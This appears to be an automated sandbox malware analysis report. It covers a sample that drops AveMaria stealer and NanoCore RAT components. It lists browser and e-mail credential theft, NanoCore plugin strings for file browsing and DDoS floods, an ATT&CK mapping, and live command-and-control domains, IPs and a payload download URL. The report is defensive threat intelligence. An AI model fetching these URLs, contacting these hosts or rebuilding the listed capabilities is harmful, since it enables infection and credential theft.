Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: \Chromium\User Data\Default\Login Data

Contains functionality to steal e-mail passwords

Show sources

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: POP3 Password
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: SMTP Password
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: IMAP Password

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\ProgramData\images.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: images.exe PID: 2044, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: KetqqsbuJ.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: KetqqsbuJ.exe, 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	LSASS Driver1	LSASS Driver1	Disable or Modify Tools1	OS Credential Dumping3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer32	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Native API1	Create Account11	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Input Capture121	System Service Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Windows Service21	Windows Service21	Obfuscated Files or Information4	Credentials In Files1	File and Directory Discovery4	SMB/Windows Admin Shares	Input Capture121	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder1	Process Injection422	Software Packing13	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading3	LSA Secrets	Security Software Discovery121	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Modify Registry1	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol122	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection422	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Users2	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Xjf4yH9N2t.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	100%	Joe Sandbox ML
C:\ProgramData\images.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Program Files\Microsoft DN1\sqlmap.dll	20%	Metadefender		Browse
C:\Program Files\Microsoft DN1\sqlmap.dll	43%	ReversingLabs	Win64.Trojan.RDPWrap
C:\ProgramData\images.exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Androm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos

Unpacked PE Files

Source	Detection	Scanner	Label	Download
22.3.images.exe.e32c38.5.unpack	100%	Avira	HEUR/AGEN.1132033	Download File
40.2.KetqqsbuJ.exe.5260000.20.unpack	100%	Avira	TR/NanoCore.fadte	Download File
22.2.images.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
40.2.KetqqsbuJ.exe.3d08a28.9.unpack	100%	Avira	TR/NanoCore.fadte	Download File
40.2.KetqqsbuJ.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.2.Xjf4yH9N2t.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
22.3.images.exe.e32c38.4.unpack	100%	Avira	HEUR/AGEN.1132033	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://hutyrtit.ydns.eu/	13%	Virustotal		Browse
http://hutyrtit.ydns.eu/	0%	Avira URL Cloud	safe
http://stascorp.comDVarFileInfo$	0%	Avira URL Cloud	safe
http://hutyrtit.ydns.eu/qB	0%	Avira URL Cloud	safe
http://hutyrtit.ydns.eu/microC.exe=S;X	0%	Avira URL Cloud	safe
http://hutyrtit.ydns.eu/microC.exeASwX	0%	Avira URL Cloud	safe
http://hutyrtit.ydns.eu/microC.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sdafsdffssffs.ydns.eu	203.159.80.186	true	false	high
hutyrtit.ydns.eu	203.159.80.165	true	false	high
hhjhtggfr.duckdns.org	203.159.80.186	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hutyrtit.ydns.eu/microC.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://support.google.com/chrome/?p=plugin_flash	images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmp	false		high
http://hutyrtit.ydns.eu/	images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://stascorp.comDVarFileInfo$	images.exe, 00000016.00000003.313221869.0000000000EB7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chro	images.exe, 00000016.00000002.482254171.0000000004A17000.00000004.00000001.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeperC:	Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	false		high
http://google.com	KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp	false		high
http://hutyrtit.ydns.eu/qB	images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/6258784	images.exe, 00000016.00000002.482229544.00000000049CB000.00000004.00000001.sdmp, images.exe, 00000016.00000002.482220451.00000000049A0000.00000004.00000001.sdmp	false		high
http://hutyrtit.ydns.eu/microC.exe=S;X	images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/syohex/java-simple-mine-sweeper	Xjf4yH9N2t.exe	false		high
http://hutyrtit.ydns.eu/microC.exeASwX	images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
203.159.80.186	sdafsdffssffs.ydns.eu	Netherlands		47987	LOVESERVERSGB	false
